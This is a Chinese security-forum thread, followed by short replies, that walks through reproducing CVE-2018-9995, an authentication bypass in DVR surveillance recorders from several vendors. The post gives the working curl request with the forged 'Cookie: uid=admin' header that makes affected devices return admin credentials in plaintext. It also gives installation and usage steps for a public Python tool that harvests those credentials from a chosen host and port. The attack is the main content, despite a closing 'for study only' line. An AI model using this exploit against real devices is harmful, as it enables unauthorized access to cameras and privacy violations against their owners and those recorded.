搜索
    Hi~登录注册
    查看: 3359|回复: 16
    收起左侧

    DVR登录验证的摄像头漏洞复现

    [复制链接]

    19

    主题

    0

    精华

    97 小时

    在线时间

    荣誉会员

    Rank: 8Rank: 8

    积分
    105
    发表于 2019-3-20 13:43:09 | 显示全部楼层 |阅读模式
    本帖最后由 云亦然 于 2019-3-20 01:47 PM 编辑

    前言
    昨天看了一个群发出来的视频,是说通过漏洞破解摄像头后台管理的,然后我就看到了是CVE-2018-9995这个漏洞。嗯 这漏洞是阿根廷一个叫费尔南德斯的大牛在4.30更新在其博客上的,直接能够获取多种DVR的明文凭证(登录密码),于是我拿来复现试了一下,是可以的!




    漏洞编号:CVE-2018-9995

    发现时间:2018-4

    影响范围:tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL

    漏洞描述:   DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一大堆设备的功能。   最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明。  

    最开始研究员发现CVE-2018-9995仅影响由TBK制造的DVR设备,但接下来发现,由其他供应商的产品同样受到影响,包括但不限于:Novo、cenova、qseepulnix、night owl。




    利用:
    $> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"



    在ZOOM:


    QQ截图20190320114955.png

    google_1.png
    QQ截图20190320114849.png


    下面是干货:

    前提是要有git、python、pip install 'tableprint'、em就这么多

    工具使用

    这个阿根廷的大牛写了个py工具,直接获取明文密码

    工具发布在了github上

    游客,如果您要查看本帖隐藏内容请回复


    工具安装

    git clone
    游客,如果您要查看本帖隐藏内容请回复


    cd CVE-2018-9995_dvr_credentials

    pip install -r requirements

    help

    usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]
    [+] Obtaining Exposed credentialsoptional arguments:  
    -h, --help     show this help message and exit  
    -v, --version  show program's version number and exit  
    --host HOST    Host  
    --port PORT    Port


    [+] Demo: python getDVR_Credentials.py --host 192.168.1.101 --p 81

    重点就是demo

    host就是ip地址
    p就是端口


    接下来就是复现  
    在浏览器那里还需要装个插件才可以开启预览

    QQ截图20190320132902.png

    QQ截图20190320133356.png

    em整个过程就是这样了

    DVR Login Bypass ( CVE-2018-9995 )
    2018年五月份的

    对了 这个仅供个人学习交流












    上一篇:cobaltstrike 3.13汉化最终版
    下一篇:一次ThinkPHP 3.2的发卡平台渗透
    QQ截图20190320114955.png

    评分

    参与人数 1网币 +5 收起 理由
    菜鸟 + 5

    查看全部评分

    回复

    使用道具 举报

    10

    主题

    0

    精华

    98 小时

    在线时间

    荣誉会员

    Rank: 8Rank: 8

    积分
    118
    发表于 2019-3-22 16:22:01 | 显示全部楼层
    亦然哥哥的摄像头工具特别多哈哈哈
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    0
    发表于 2021-5-3 19:49:10 | 显示全部楼层
    顶一个再说吧、学习一下
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-3-20 13:44:50 | 显示全部楼层
    我也只是真的想学学
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    21
    发表于 2019-3-20 13:46:22 | 显示全部楼层
    很不错啊
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    1 小时

    在线时间

    新手上路

    Rank: 1

    积分
    33
    发表于 2019-3-20 13:47:02 | 显示全部楼层
    酱油级伸手党路过
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-3-20 13:48:27 | 显示全部楼层
    路过收藏~~
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-3-20 13:49:16 | 显示全部楼层
    谢谢,应该是个好东西,希望不要让人失望
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    1 小时

    在线时间

    新手上路

    Rank: 1

    积分
    59
    发表于 2019-3-20 13:50:29 | 显示全部楼层
    想学习一下,看起来还不错
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    15
    发表于 2019-3-20 13:51:00 | 显示全部楼层
    在努力!会加油的!
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    21
    发表于 2019-3-20 13:51:54 | 显示全部楼层
    好东西?
    回复 支持 反对

    使用道具 举报

    0

    主题

    0

    精华

    0 小时

    在线时间

    新手上路

    Rank: 1

    积分
    7
    发表于 2019-3-20 14:01:33 | 显示全部楼层
    顶一个再说吧、
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表